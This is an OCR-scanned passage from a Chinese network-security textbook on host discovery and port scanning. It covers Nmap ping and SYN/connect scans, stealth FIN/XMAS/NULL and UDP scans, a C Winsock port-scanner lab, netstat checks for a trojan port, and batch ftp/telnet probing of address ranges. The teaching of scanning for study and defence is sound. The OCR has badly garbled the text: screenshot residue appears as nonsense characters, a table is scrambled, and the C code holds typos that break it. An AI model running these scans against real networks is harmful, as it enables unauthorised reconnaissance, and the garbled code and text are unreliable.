Windows 的 防火 墙 ,从 ping 结果 看 目标 机 不 在 线 , 而 从 Nmap 看 ,目标 机 则 在 线 。 为 什么 会 
产生 这 样 的 情况 ? 

这 跟 两 种 软件 的 探测 方法 有 关 。Windows 的 ping 命令 仅 靠 ICMP 包 来 实施 探测 ,一 旦 
ICMP 包 被 拦截 ,就 不 能 获知 目标 机 的 真实 情况 。 而 Nmap 则 会 发 送 4 种 不 同类 型 的 数据 
包 来 探测 目标 主机 是 否 在 线 , 这 4 种 类 型 是 ICMP echo request、TCP SYN packet to port 
443、TCP ACK packet to port 80 和 ICMP timestamp request。Nmap 依次 发 送 4 个 报 文 探 
测 目标 机 是 否 开启 ,只 要 收 到 其 中 一 个 包 的 回复 ,就 证 明 目 标 机 开启 。 这 样 可 以 避免 因 防 火 
墙 或 丢 包 造成 的 判断 错误 。 

为 此 ,使 用 Wireshark 观察 Nmap 探测 目标 机 的 数据 包 , 如 图 2-4 所 示 。 证 明 本 次 
Nmap 发 出 的 探测 包 是 TCP SYN。 


同 Wireshork IDIOT 可 3 
Ele Edt View Go Capture Anayze Statstics Telephony Took Intemas Hep 


人 68 和 | 昌 折 BIA9 人 OFT 国 国 QQQO 国 风 其 | 加 


Filter: | ipaddr == 172.16.1.222 | = | Expression.。 Clear Appy Save 


lo Time Source Destination Protocol Length Info 


图 2-4 nmap -sP 172. 16.1.222 抓 包 截图 


所 以 ,实际 原因 是 ,开启 防火 墙 后 过 滤 了 ICMP 的 数据 包 , 因 而 没有 Echo Reply。 而 
nmap-sP 则 并 行使 用 ICMP 和 TCP 协议 的 包 进 行 探测 ,TCP 包 没 有 被 防火 墙 过 滤 。 

【 例 2-2】 批量 探测 局 域 网 内 的 活动 主机 ,例如 扫描 局 域 网 172. 16. 1. 100 一 172. 16.1. 
120 范围 内 的 活动 主机 ,命令 如 下 : 


nmap - sn 172.16.1.100- 120 


问 Nmap 向 目标 机 发 送 了 什么 探测 包 ? 

为 了 回答 这 个 问题 ,只 须 分 析 从 Wireshark 抓 取 的 包 。 从 抓 取 结 果 可 以 看 到 (请 读者 自 
行 截图 ) ,在 局 域 网 内 , Nmap 是 通过 ARP 包 来 询问 IP 地 址 上 的 主机 是 否 活动 的 ,如 果 收 到 
ARP 回复 包 , 则 说 明 主 机 在 线 。 


2.1.2 端口 扫描 


端口 是 由 TCP 协议 定义 的 ,TCP 协议 通过 套 接 字 建 立 起 两 台 计 算 机 之 间 的 网 络 连 接 。 

套 接 字 采 用 [LIP 地 址 : 端口 号 ] 的 形式 来 定义 主机 中 的 进程 ,通过 套 接 字 中 不 同 的 端口 号 可 

以 区 别 同 一 台 计 算 机 上 不 同 的 连接 进程 。 对 于 两 台 计算 机 间 的 任 一 个 TCP 连接 ,一 台 计 

算 机 的 一 个 LIP 地 址 : 端口 ] 套 接 字 会 和 另 一 台 计算 机 的 一 个 LIP 地 址 : 端口 ] 套 接 字 相对 

应 ,彼此 标识 着 源 端 .目的 端 上 数据 包 传输 的 源 进 程 和 目的 进程 。 例 如 ,要 和 远程 主机 X 的 
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程序 通信 ,只 要 把 数据 发 向 [X: 端口 ] 就 可 以 实现 通信 了 。 由 此 可 见 .端口 和 服务 进程 一 一 
对 应 ,通过 扫描 开放 的 端口 ,就 可 以 判断 出 计算 机 正在 运行 的 服务 进程 中 有 哪些 通信 进程 正 
在 等 待 连接 ( 即 该 进程 正在 监听 ) ,这 也 是 端口 扫描 的 主要 目的 。 也 就 是 说 ,端口 扫描 就 是 连 
接 目标 主机 的 TCP 和 UDP 端口 ,确定 哪些 服务 正在 运行 ( 即 处 于 监听 状态 ) 的 过 程 。 事 实 
上 ,端口 扫描 是 向 每 个 端口 一 次 发 送 一 个 消息 的 过 程 ,通过 分 析 响 应 来 判断 服务 端口 是 打开 
还 是 关闭 。 

目前 IPv4 协议 支持 16 位 的 端口 .端口 号 范围 是 0~65 535。 其 中 ,0 一 1023 号 端口 保 
留 给 常用 的 网 络 服务 (例如 ,21 端口 为 FTP 服务 ,23 端口 为 TELNET 服务 ,25 端口 为 
SMTP 服务 ,80 端口 为 HTTP 服务 ,110 端口 为 POP3 服务 等 ) 。 

许多 常用 的 服务 使 用 的 是 标准 的 端口 ,只 要 扫描 到 相应 的 端口 ,就 能 知道 目标 主机 上 运 
行 着 什么 服务 。 端 口 扫 描 技术 就 是 利用 这 一 点 向 目标 系统 的 TCP/UDP 端口 发 送 探测 数 
据 包 ,记录 目标 系统 的 响应 ,通过 分 析 响 应 来 查看 该 系统 处 于 监听 或 运行 状态 的 服务 。 

进行 扫描 的 方法 有 手工 和 自动 之 分 。 手 工 扫 描 时 ,需要 熟悉 各 种 命令 ,对 命令 执行 后 的 
输出 进行 分 析 。 自 动 扫描 利用 扫描 软件 进行 (或 自行 编写 扫描 程序 )。 许 多 扫描 器 都 有 分 析 
数据 的 功能 ,能 根据 端口 扫描 的 结果 进行 操作 系统 探测 和 漏洞 扫描 ,从 而 发 现 系 统 的 安全 
漏洞 。 

1. 端口 扫描 技术 

端口 扫描 时 发 送 一 组 端口 扫描 消息 ,试图 了 解 其 提供 的 计算 机 网 络 服务 类 型 (这 些 网 络 
服务 均 与 端口 号 相关 ) 。 接 收 到 的 回应 类 型 表示 是 否 在 使 用 该 端口 并 且 可 由 此 探寻 弱点 。 
端口 扫描 大 体 上 分 为 TCP 扫描 和 UDP 扫描 两 类 。 

1) TCP 端口 扫描 

TCP 扫描 技术 主要 使 用 TCP 连接 的 三 次 握手 和 TCP 数据 头 标志 ,TCP 数据 报头 6 个 
标志 如 表 2-2 所 示 。 


表 2-2 TCP 数据 报头 标志 位 
标志 位 意 义 
URG | 紧急 数据 标志 。 如 果 为 1 ,表示 本 数据 包 中 包含 紧急 数据 ,此 时 紧急 数据 指针 有 效 
如 果 置 位 ,接收 端 应 尽快 把 数据 传送 给 应 用 层 。PSH 表示 数据 包 的 接收 者 将 收 到 的 数据 直接 
交 给 应 用 程序 ,而 不 是 把 它 放 在 缓冲 区 .等 缓冲 区 满 才 交 给 应 用 程序 。 这 常用 于 实时 通信 
用 来 建立 一 个 连接 。RST 标志 置 位 的 数据 包 称 为 复位 包 。 一般 情况 下 ,如 果 TCP 收 到 的 一 个 
分 段 明显 不 是 属于 该 主机 上 的 任何 一 个 连接 . 则 向 远 端 发 送 一 个 复位 包 
用 来 建立 连接 ,让 连接 双方 同步 序列 号 。 如 果 SYN=1 而 ACK 一 0, 则 表示 该 数据 包 为 连接 请 
SYN | 求 ,如 果 SYN=1 而 ACK==1 则 表示 接受 连接 。SYN 通常 被 用 来 指明 请 求 连接 和 请 求 被 接受 。 
而 用 ACK 来 区 分 这 两 种 情况 


用 来 释放 一 个 连接 。 表 示 发 送 端 已 经 没有 数据 要 求 传输 了 ,希望 释放 连接 。SYN 和 FIN 的 
TCP 数据 包 都 有 序列 号 ,因此 这 样 可 保证 数据 按 正 确 的 顺序 被 接收 并 处 理 


ACK | 确认 标志 位 。 如 果 为 1, 表 示 包 中 的 确认 号 是 有 效 的 ,否则 包 中 的 确认 号 无 效 


PSH 


RST 


FIN 


完整 的 TCP 连接 分 3 步 ,也 称 3 次 握手 ,过 程 如 下 。 

第 1 步 ,请 求 端 发 送 一 个 SYN 包 , 指 明 打 算 连 接 的 目的 端口 。 

第 2 步 ,观察 目的 端的 返回 包 , 如 返回 SYN/ACK 包 , 说 明 目 的 端口 处 于 侦 听 状态 ; 返 
® 55 


回 RST/ACK 包 , 说 明 目 的 端口 没有 侦 听 ,连接 会 重 置 。 
第 3 步 , 若 返 回 SYN/ACK 包 , 则 请 求 端 向 目的 端口 发 送 ACK 包 完 成 3 次 握手 ,连接 

建立 。 

这 个 过 程 如 图 2-5 所 示 ,图 2-5(a) 表 明 扫 描 机 与 目标 主机 完成 了 3 次 握手 过 程 ,端口 是 

打开 的 。 

SYN 


恒 SYN/ACK | 团 


ACK 
源 主机 一 | 目标 主机 


(a) TCP 建 立 连接 的 3 次 握手 过 程 


a | 


目标 主机 


(b) TCP 的 3 次 握手 过 程 没有 完成 
图 2-5 TCP 建立 连接 


TCP 扫描 技术 就 是 利用 3 次 握手 过 程 与 目标 主机 建立 完整 连接 ,通过 对 回应 包 的 分 析 
获知 目标 主机 的 状态 。 但 实际 上 通常 这 种 探测 更 多 的 是 建立 在 不 完整 连接 上 的 。 因 为 完整 
连接 时 间 长 且 容 易 被 日 志文 件 记 录 ,而 不 完整 连接 也 能 获得 目标 主机 的 信息 ,例如 ,图 2-3(b) 
就 是 一 个 不 完整 连接 。 下 面 讨论 TCP 的 探测 技术 。 

(1) TCP 全 连接 扫描 。 

全 连接 扫描 就 是 和 目标 主机 建立 一 个 TCP 完整 连接 ,而 目标 主机 的 日 志文 件 中 会 生 
成 记录 。 全 连接 扫描 是 TCP 端口 扫描 的 基础 ,目前 全 连接 扫描 有 TCP connect() 扫 描 和 
TCP 反 向 ident 扫描 等 。 

扫描 主机 通过 TCP/IP 协议 的 3 次 握手 过 程 (SYN,SYN/ACK,ACK) 与 目标 主机 的 指 
定 端口 建立 一 次 完整 的 连接 。 例 如 ,发 送 一 个 SYN 置 位 的 报 文 ,如 果 SYN 置 位 瞄准 的 端 
口 是 开 放 的 ,SYN 置 位 的 报 文 到 达 开 放 的 端口 时 ,就 会 返回 SYN 十 ACK ,代表 其 能 够 提供 
相应 的 服务 。 发 送 方 收 到 SYN 十 ACK 后 ,返回 给 对 方 一 个 ACK( 图 2-5(a))。 连 接 由 系统 
调用 connect() 开 始 。 如 果 端 口 开 放 , 则 连接 将 建立 成 功 (图 2-5(a)) ;否则 ,车 返回 一 1 则 表 
示 端 口 关闭 (图 2-5(b))。 

如 果 建 立 连 接 成 功 , 即 目标 主机 响应 扫描 主机 的 SYN/ACK 连接 请 求 ,这 一 响应 表明 
目标 端口 处 于 监听 (打开 ) 的 状态 。 如 果 目 标 端口 处 于 关闭 状态 , 则 目标 主机 会 向 扫描 主机 
发 送 RST 的 响应 。 

TCP 连接 扫描 技术 的 优点 是 不 需要 任何 权限 ,速度 快 , 系 统 中 的 任何 用 户 都 有 权利 使 
用 这 个 调用 。 但 如 果 对 每 个 目标 端口 以 线性 的 方式 使 用 单独 的 connect() 函数 调用 ,将 会 比 
较 费 时 。 一 般 需 要 采用 同时 打开 多 个 套 接 字 的 方法 以 加 速 扫描 。 但 这 种 方法 的 缺点 是 很 容 
易 被 发 现 ,同时 也 容易 被 过 滤 。 建 立 连接 时 ,目标 主机 的 日 志文 件 会 显示 一 连 串 的 连接 和 连 
接 出 错 的 服务 消息 ,这 样 目标 主机 用 户 发 现 后 就 可 能 很 快 关闭 端口 。 
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Nmap 就 有 TCP connect() 扫描 命令 : 


nmap - ST -P 80 -PO -n www.server.com 


其 中 ,参数 -n 表示 不 对 域名 进行 反 向 解析 ,-P0 表示 扫描 前 不 进行 主机 存活 性 探测 ,-p 用 于 
指定 端口 。 

【 例 2-3】〗 分 别 对 目标 主机 采用 全 扫描 、 半 扫描 方式 进行 扫描 ,对 扫描 结果 (包括 端口 、 
时 间 等 ) 的 差异 作出 说 明 。 

为 完成 实验 ,假设 测试 机 的 系统 均 为 Windows 7, 目 标 机 的 IP 地 址 是 172. 18. 187. 
171 ,实验 时 关闭 目标 机 的 防火 墙 ( 读 者 可 自行 完成 开放 防火 墙 的 情况 测试 ) 。 

@ 在 测试 机 上 使 用 全 扫描 方式 对 目标 主机 进行 TCP 端口 扫描 : 


nmap - sT 172.18.187.171 


其 结果 如 图 2-6 所 示 。 
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图 2-6 全 扫描 方式 进行 TCP 端口 扫描 


@ 在 测试 机 上 使 用 SYN 半 扫 描 方式 对 目标 主机 进行 TCP 端口 扫描 : 


nmap - SS 172.18.187.171 


其 结果 如 图 2-7 所 示 。 

@ 比较 上 述 两 次 扫描 结果 的 差异 和 扫描 所 花费 的 时 间 。 并 进行 解释 。 

在 目标 主机 关闭 防火 墙 的 情况 下 ,全 扫描 和 半 扫 描 到 目标 主机 开放 的 TCP 端口 均 有 
IO 个。 
在 同样 情况 下 ,采用 TCP 全 扫描 方式 和 TCP SYN 半 扫 描 方式 用 时 分 别 为 227. 85s 和 
0.44s,SYN 半 扫 描 方式 花费 的 时 间 显 然 比 全 扫描 方式 的 少 得 多 。 这 是 因为 TCP 全 扫描 需 
要 扫描 方 通过 3 次 握手 过 程 与 目标 主机 建立 完整 的 TCP 连接 ,而 半 扫 描 方式 下 扫描 方 不 需 
要 打开 一 个 完全 的 TCP 连接 ,只 需 在 建立 TCP 连接 的 中 间 状 态 发 送 一 个 TCP 同步 包 
(SYN) ,然后 等 待 回应 ,因此 用 时 比 完整 的 TCP 连接 少 。 
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图 2-7 半 扫 描 方式 进行 TCP 端口 扫描 


为 了 进一步 说 明 这 个 问题 ,可 以 在 扫描 时 分 别 抓 取 数 据 包 (请 自行 完成 ) ,分 析 说 明 , 半 
扫描 的 确 未 完成 3 次 握手 连接 。 还 可 以 查看 目标 主机 的 日 志 ( 如 果 是 Windows 系统 ,可 通 
过 打开 “计算 机 ”的 “管理 ”中 的 “事件 查看 器 "查看 ) ,看 是 否 记 录 了 被 连接 的 情况 。 

(2) TCP 半 连 接 扫 描 。 

半 连 接 扫描 也 称 为 TCP SYN 扫描 ,其 故意 违反 TCP 的 3 次 握手 的 规则 。 此 扫描 方 发 
送 SYN 包 开 始 3 次 握手 并 等 待 目标 主机 的 响应 ,如 果 收 到 SYN/ACK 包 , 则 说 明 端 口 处 于 
侦 听 状态 ,扫描 方 马上 发 送 RST 包 , 中 止 连接 (图 2-8)。 因 为 半 连 接 扫描 并 没有 建立 连接 ， 
目标 主机 的 日 志文 件 中 可 能 不 会 记录 此 扫描 。 目 前 半 连 接 扫描 有 TCP SYN 扫描 和 IP ID 
头 dumb 扫描 等 。 Sei opti Paes 中 对 扫描 有 所 记录 ,但 是 尝试 进行 连接 的 
记录 也 要 比 全 扫描 少 得 多 。 其 缺点 是 在 大 部 分 操作 系统 下 发 送 主机 需要 构造 适用 于 这 种 扫 
描 的 IP 包 。 但 由 于 SYN 洪 泛 作为 一 DDoS 攻击 手段 被 大 量 采 用 ,因此 很 多 防火 墙 都 会 
对 SYN 报 文 进行 过 滤 ,所 以 这 种 方法 并 不 能 总 是 有 效 。 
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图 2-8 TCP SYN 扫描 


Nmap 就 有 TCP SYN 扫描 命令 : 
nmap - SS -P 80 www.server .com 


(3) TCP 隐蔽 扫描 。 
TCP 协议 标准 文档 RFC793 指出 ,处 于 关闭 状态 的 端口 在 收 到 探测 包 时 会 响应 RST 
包 , 而 处 于 侦 听 状态 的 端口 则 忽略 此 探测 包 。 根 据 发 送 探测 包 的 不 同 ,TCP 隐蔽 扫描 又 分 
为 SYN/ACK 扫描 、FIN 扫描 `XMAS( 圣 诞 树 ) 扫 描 和 NULL 扫描 4 种 。 
SYN/ACK 扫描 和 FIN 扫描 均 绕 过 TCP 的 3 次 握手 过 程 的 第 一 步 , 直 接 向 目的 端口 
发 送 SYN/ACK 包 或 者 FIN 置 位 的 数据 包 。 由 于 TCP 是 有 连接 的 传输 协议 ,知道 在 第 一 
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步 中 应 该 发 送 的 是 SYN 包 而 实际 上 并 没有 发 送 , 从 而 认为 此 连接 过 程 出 错 。 此 时 如 果 目 
标 主机 的 该 端口 没有 打开 , 则 返回 一 个 TCP RST 数据 包 以 拆除 连接 ;和 否则 不 回复 。 此 扫描 
方式 的 优点 是 比较 隐蔽 ,不 容易 被 发 现 。 但 该 方式 有 两 个 缺点 : 首先 ,要 判断 对 方 端口 是 否 
开放 必须 等 待 超时 ,增加 了 探测 时 间 ,而 且 容 易 得 出 错误 的 结论 ;其 次 ,一 些 系 统 并 没有 遵循 
上 述 规定 (例如 Windows)。 这 些 系统 一 旦 收 到 这 样 的 数据 包 ,无论 端 口 是 否 开放 ,都 会 回 
应 一 个 RST 连接 复位 数据 包 , 从 而 导致 此 方法 失效 。 此 特性 被 用 来 判断 目标 主机 是 否 是 
Windows 操作 系统 。 

XMAS 扫描 和 NULL 扫描 正好 相反 。XMAS 扫描 设置 TCP 包 中 所 有 标志 位 (URG 、 
ACK RST、PSH SYN 和 FIN) ,如 果 目 标 主机 的 该 端口 是 “ 关 ” 状 态 , 则 返回 一 个 TCP RST 
数据 包 , 否 则 不 回复 。 据 此 可 以 判断 哪些 端口 是 开放 的 。 而 NULL 扫描 则 向 目标 主机 的 一 
个 端口 发 送 所 有 标志 位 都 为 空 的 TCP 数据 包 , 如 果 目 标 主 机 的 该 端口 是 “ 关 ” 状 态 , 则 返回 
一 个 TCP RST 数据 包 ,和 否则 不 回复 ,以 此 判断 对 方 端口 的 开关 状态 。 

2) UDP 扫描 

UDP 协议 是 面向 非 连接 的 ,通信 双方 由 于 不 需要 建立 连接 ,因而 也 不 需要 关闭 连接 , 甚 
至 在 通信 期 间 , 任 何 一 方 也 不 需要 对 对 方 的 数据 包 进 行 回 复 。 为 了 发 现 正在 服务 的 UDP 
端口 ,通常 的 扫描 方式 是 构造 一 个 内 容 为 空 的 UDP 数据 包 送 往 目 的 端口 。 若 目的 端口 上 
有 服务 正在 等 待 , 则 目的 端口 返回 错误 的 消息 ;车 目的 端口 处 于 关闭 状态 , 则 目的 主机 返回 
ICMP 端口 不 可 达 消 息 。 如 果 目 标 端 口 是 以 一 个 ICMP port Unreachable( 即 ICMP 端口 不 
可 到 达 ) 消 息 作为 响应 ,那么 该 端口 是 关闭 的 。 相 反 , 如 果 没 有 收 到 这 个 消息 , 则 可 推断 该 端 
口 是 打开 的 。 由 于 UDP 和 ICMP 错误 都 不 保证 能 到 达 , 因 此 一 次 扫描 的 结果 不 一 定 准确 ， 
有 时 需要 多 次 扫描 才能 得 到 准确 的 结果 ,精度 较 低 。 另 外 , 当 试 图 扫描 一 个 大 量 应 用 分 组 过 
滤 功 能 的 设备 时 ,UDP 扫描 将 是 一 个 非常 缓慢 的 过 程 。 

UDP 扫描 的 优点 是 隐蔽 性 好 , 因 其 不 包含 标准 的 TCP 三 次 握手 协议 的 任何 部 分 ,属于 
“秘密 扫描 ”。 但 利用 UDP 作为 扫描 的 基础 协议 ,就 会 对 精度 、 延 时 产生 较 大 影响 。 

实验 2-2 ”TCP 端口 扫描 实验 

【实验 目的 】 掌握 Socket 连接 .了 解 端口 基本 使 用 。 


【实验 内 容 】 

(1) 要 求 用 户 输入 命令 参数 格式 如 下 : 

IP (扫描 该 IP 的 所 有 端口 ) 

IP 端口 (扫描 该 IP 的 该 指定 端口 ) 

IP 端口 1 端口 2 (扫描 指定 的 该 IP 端口 1 和 端口 2) 


如 格式 有 错 , 系 统 会 提示 帮助 信息 。 

(2) 根据 以 上 IP 地 址 和 端口 建立 Winsock 连接 ,如 果 建 立 连 接 成 功 , 则 返回 该 IP 的 该 
端口 打开 的 消息 ,否则 提示 端口 未 打开 。 

【实验 过 程 】 

假设 程序 名 是 PortSweep, 则 其 命令 行 参数 argv[ ] 最 多 应 有 3 个 : argv[1]= 1IP， 
argv[2] 王 端口 1( 如 无 输入 表示 0 一 65 535) ,argv[3] 王 端口 2( 如 无 输入 表示 只 扫描 端口 
1)。 此 外 ,argv[0] 王 PortSweep。 

在 连接 方式 上 ,采用 TCP 全 连接 扫描 ,主要 是 通过 函数 connect() 判 断 连接 是 否 成 功 。 
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下 面 是 简单 的 C 程序 ,为 便于 阅读 理解 ,多 数 语句 加 了 注释 。 


#include < stdio.h> 


#include <winsock.h> 


#pragma comment (lib, "wsock32.1ib") 


int main (int argc char * * argv) 


{ 
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SOCKET sd client; 
u short iPortStart, iPortEnd, port; 


struct sockaddr in addr srv; 


char * pszHost; 
WSADATA wsaData; 
WORD wVersionRequested; 


int err; 


switch (argc) 
{ 
case 2: 
iPortStart=0; 
iPortEnd= 65535; 
PszHost= argv [1]; 
break; 
case 3: 
iPortStart=iPortEnd=atoi (argv [2]); 
PszHost= argv [1]; 
break; 
case 4: 
iPortStart=atoi (argv[2]); 
iPortEnd=atoi (argv [3]); 
PszHost= argv[1]7 
break; 
default: 
printf ("命令 使 用 格式 :\n"); 
printf ("%s,%s",argv[0], " IP [端口 1] 


// 告 诉 编译 器 在 编译 形成 的 .cbj 文件 和 .exe 
// 文 件 中 加 一 条 信息 ,使 得 链接 器 在 链接 库 的 
// 时 候 要 去 找 wsock32.1ib 库 ,不 要 先 去 找 
// 别 的 库 

// 参 数 个 数 在 argc 中 


// 远 程 服务 器 套 接 字 地 址 ， 包括 服务 器 的 IP 
// 地 址 和 端口 号 


//Socket 的 版 本 信息 


[端口 2] 扫描 所 有 端口 \n"); 


printf ("$s,%s",argv[0]," IP 扫描 指定 IP 的 所 有 端口 \n"); 
printf ("%s,$s",argv[0]," IP 端口 扫描 指定 的 端口 \n"); 


printf ("$s,%s",argv[0]," IP [端口 1] 


return 1; 


[端口 2] 扫描 端口 1 和 端口 2\n"); 


wVersionRequested=MAKEWORD (1, 1); // 返 回 无 符号 16 位 整 型 数 

err=WSAStartup (wVersionRequested, &wsaData); //Winsock 服务 初始 化 
// 首 参数 指明 程序 请 求 使 用 的 socket 版 本 
// (高 位 字 节 指明 副 版 本 、 低 位 字 节 指明 主 
// 版 本 ) 
// 次 参数 返回 请 求 的 Socket 的 版 本 信息 

if(err !=0) //Winsock 服务 初始 化 失败 

{ 

printf ("Error %d: Winsock not available\n", err); 


return 1; 


for (port= iPortStart; port<=iPortEnd; port++) 
{ 
sd client=socket (PF_INET, SOCK STREAM, 0); 
// 创 建 套 接 字 :因特网 协议 ,基于 连接 的 字 节 流 方式 
ifl(sd client==INVALID SOCKET) // 函 数 返 回 INVALID_SocKET 值 ,表明 调 用 失败 
1 
Printf ("no more socket resources\n"); 
return 1; 
} 
addr srv.sin family=PF INET; 
addr srv.sin addr.s addr=inet addr (pszHost); 
addr_srv.sin port=htons (port); 
err=connect (sd client, (struct sockaddr * )&addr srv, sizeof (addr srv)); 
// 发 出 连接 请 求 
if (err== INVALID SOCKET) // 连 接 失 败 
{ 
printf ("不 能 连接 此 端口 :$d\n", port); 
closesocket (sd_client); // 关 闭 套 接口 ,释放 大 ,接口 描述 字 sd_client 


continue; 


printf ("扫描 到 此 端口 开放 :%d\n", port); 


Closesocket (sd_client); 


由 //for () 
WSACleanup () 7 // 中 止 Windows Sockets 在 所 有 线程 上 的 操作 
return 0; 

} 

【实验 思考 】 


(1) 根据 程序 的 执行 结果 ,对 于 被 扫描 到 的 开放 端口 .用 ftp、telnet、Nmap 等 命令 进行 
验证 。 
(2) 启动 Wireshark 跟踪 程序 ,对 捕获 的 数据 包 进 行 连接 过 程 的 分 析 。 
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2. 端口 手工 扫描 


手工 扫描 大 部 分 使 用 的 是 命令 行 的 程序 或 操作 系统 提供 的 内 部 命令 。 一 些 端口 特别 适 
用 于 命令 扫描 ,例如 端口 号 为 21、23、80 的 端口 。 如 果 要 使 用 这 些 命 令 , 需 要 先进 入 命令 提 


示 符 窗口 。 

1) 扫描 本 机 正在 使 用 的 端口 

对 本 机 端口 进行 扫描 ,最 简单 的 方法 就 是 使 用 netstat 命令 。netstat 命令 是 用 于 显示 
协议 统计 信息 和 当前 TCP/IP 网 络 连接 的 程序 ,该 命令 可 使 用 多 个 组 合 参数 ,如 netstat -a 
(查看 开启 了 哪些 端口 ,包括 TCP 和 UDP 端口 ) ,netstat -an( 查 看 TCP 连接 的 地 址 和 端口 
号 ) ,netstat -anb( 查 看 可 疑 端口 ) 等 。 

例如 ,要 查看 本 机 器 开放 的 端口 ,在 命令 提示 符 窗口 下 ,输入 netstat -an, 回 车 后 显示 


活动 连接 

协议 ”本 地 地 址 外 部 地 址 状态 

TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 
TCP 0.0.0.0:843 0.0.0.0:0 LISTENING 
TCP 0.0.0.0:4466 0.0.0.0:0 LISTENING 
TP 0.0.0.0:7626 0.0.0.0:0 LISTENING 
TCP 192.168.1.101:139 0.0.0.0:0 LISTENING 
TCP 192.168.1.101:51124 221.221.232.161:4466 ESTABLISHED 
TCP 192.168.1.101:53145 59.34.160.99:4466 ESTABLISHED 
TCP 192.168.1.101:53148 111.206.79.144:80 ESTABLISHED 
UDP 0.0.0.0:500 其 3 革 

UDP 0.0.0.0:1900 尖 3 兴 

UDP 0.0.0.0:3600 兴 3 闪 


分 析 查 询 结果 ,本 地 机 器 打开 的 端口 有 135、445、843、4466、7626 等 。 尤 其 注意 到 7626 
端口 已 经 开放 ,正在 监听 ,等 待 连接 ,而 这 正 是 冰河 木马 使 用 的 特定 端口 ,由 此 可 发 现 像 这 样 
的 情况 极 有 可 能 已 经 感染 了 冰河 森马。 可 见 端口 扫描 的 积极 作用 。 

2) 扫描 网 络 主机 使 用 21、23、80 端口 

(1) 探测 21 端口 : 这 是 FTP 服务 指定 的 使 用 端口 ,要 判断 目标 主机 172. 16. 1. 99 是 否 
开放 21 号 端口 ,只 需要 在 命令 提示 符 窗 口中 输入 


ftp 172.16.1.99 


如 果 回 车 后 显示 FTP 欢迎 信息 ,要求 输 入 用 户 名 和 口令 , 则 表示 目标 主机 打开 了 21 号 
端口 , 即 端 口 21 中 提供 了 FTP 服务 ;否则 表示 端口 21 处 于 关闭 状态 。 
整 段 IP 的 21 端口 探测 可 以 用 下 面 的 语句 : 


for /1 si in(10,1,20)do start /max /low ftp 172.16.1.%i 


此 语句 将 探测 172. 16. 1. 10 一 172. 16. 1. 20 段 的 21 端口 ,start /max /low 的 作用 是 : 对 每 

一 个 IP 运行 后 将 会 依次 弹出 新 的 命令 提示 符 窗口 ,每 个 窗口 对 应 一 个 IP 地 址 21 端口 的 扫 

描 结 果 。 查 看 这 些 窗 口 ,处 于 等 待 登录 的 主机 21 端口 处 于 开放 状态 ,其 他 的 表示 关闭 。 此 
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方法 不 宜 一 次 探测 太 长 的 IP 段 ,因为 打开 的 窗口 占用 过 多 的 资源 。start 命令 可 通过 
start/? 学 习 其 用 法 。 

(2) 探测 23 端口 : 这 是 Telnet 服务 指定 的 使 用 端口 ,要 判断 目标 主机 172. 16. 1. 99 是 
否 开放 23 号 端口 ,只 需 在 命令 提示 符 窗口 中 输入 

telnet 172.16.1.99 


如 果 回 车 后 显示 Telnet 欢迎 信息 ,要 求 输入 用 户 名 和 口令 , 则 表示 目标 主机 端口 23 处 
于 打开 状态 , 即 端口 23 中 提供 了 Telnet 服务 ;否则 表示 端口 23 处 于 关闭 状态 (Windows 7 
默认 没有 安装 Telnet ,需要 另行 安装 启用 ) 。 

整 段 IP 的 23 端口 探测 可 以 用 下 面 的 语句 : 

for /1 si in(10,1,20)do start /max /low telnet 172.16.1.%i 


此 语句 将 探测 172. 16. 1. 10 一 172. 16. 1. 20 段 的 23 端口 。 与 FTP 情况 不 同 的 是 ,凡是 
该 窗口 所 对 应 的 IP 主机 未 开 或 未 打开 端口 23 的 窗口 将 在 5s 后 自动 关闭 ,检查 剩 下 的 未 关 
闭 的 窗口 就 可 以 找到 目标 主机 。 

扫描 主机 172. 16. 1. 99 小 范围 内 可 能 的 端口 2000 一 2010 可 以 用 下 面 的 语句 : 


for /1 %i in(2000,1,2010)do start /max /low telnet 172.16.1.99 %i 


(3) 探测 80 端口 : 80 端口 为 HTTP 默认 服务 端口 。 一 般 此 端口 是 打开 的 。 也 可 以 用 
telnet 命令 探测 : 


telnet 172.16.1.99 80 


如 果 执 行 后 没有 反应 ,说 明 80 端口 没 打开 ,和 否则 会 进入 另 一 个 命令 行 窗口 (或 者 窗口 变 
为 空白 界面 ) ,说 明 端 口 是 打 开 的 。 
整 段 IP 的 80 端口 探测 可 以 用 下 面 的 语句 : 


for /1 si in(10,1,20)do start /max /low telnet 172.16.1.%i 80 


此 语句 将 探测 172. 16. 1. 10 一 172. 16. 1. 20 段 的 80 端口 。 凡 是 该 窗口 所 对 应 的 IP 主 
机 未 开 或 未 打开 端口 80 的 窗口 将 在 5s 后 自动 关闭 , 剩 下 的 未 关闭 窗口 就 是 所 要 的 目标 
主机 。 

除了 以 上 常见 的 WWW(80) FTP(21) .TELNET(23) 等 端口 外 ,还 有 一 些 较为 熟知 的 
端口 也 需要 给 予 关注 ,例如 135、.137 一 139.445、1433、5632 等 。 

3. Nmap 端口 扫描 

端口 扫描 是 Nmap 最 基本 、 最 核心 的 功能 ,用 于 确定 目标 主机 的 TCP/UDP 端口 的 开 
放 情 况 。Nmap 以 隐秘 的 手法 避 开 入 侵 检测 系统 的 监视 ,并 尽 可 能 不 影响 目标 系统 的 日 常 
操作 。 默 认 情 况 下 , Nmap 会 扫描 1000 个 最 有 可 能 开放 的 TCP 端口 。 

Nmap 通过 探测 将 端口 划分 为 6 个 状态 ,如 表 2-3 所 示 。 

Nmap 支持 大 约 十 几 种 扫描 技术 。 一 般 一 次 只 用 一 种 方法 ,除了 UDP 扫描 (-sU) 外 ,可 
以 和 任何 一 种 TCP 扫描 类 型 结合 使 用 。 

运行 Nmap 命令 就 可 以 了 解 其 用 法 ,其 中 关于 端口 发 现 的 一 些 基本 参数 如 下 : 
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表 2-3 Nmap 确定 的 端口 状态 


状 态 意 奖 
open 端口 是 开放 的 
closed 端口 是 关闭 的 
filtered 端口 被 防火 墙 IDS/IPS 屏蔽 ,无 法 确定 其 状态 
unfiltered 端口 没有 被 屏蔽 ,但 是 否 开放 需要 进一步 确定 


open|filtered 


端口 是 开放 的 或 被 屏蔽 


closed |filtered 


SCAN TECHNIQUES: 


端口 是 关闭 的 或 被 屏蔽 


- SS/sT/sA/sW/sSM: TCP SYN/Connect () /ACK/Window/Maimon scans 


- sU: UDP Scan 


— sN/sF/sX: TCP Null, FIN, and Xmas scans 


--scanflags <flags> : Customize TCP scan flags 


=- SI <zombie host[:probeport]> : Idle scan 
- sY/s2: SCTP INIT/COOKIE- ECHO scans 


- sO: IP Protocol scan 


